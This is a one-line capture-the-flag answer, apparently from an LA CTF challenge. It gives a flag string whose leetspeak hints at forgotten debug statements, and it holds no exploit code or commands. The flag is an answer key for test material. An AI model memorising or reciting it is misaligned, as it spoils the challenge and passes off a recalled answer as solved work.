**Flag:** `lactf{1_R34LlY_n33D_T0_r3m3m83R_t0_R3M0V3_My_d38U9_5T4t3m3nt2}`
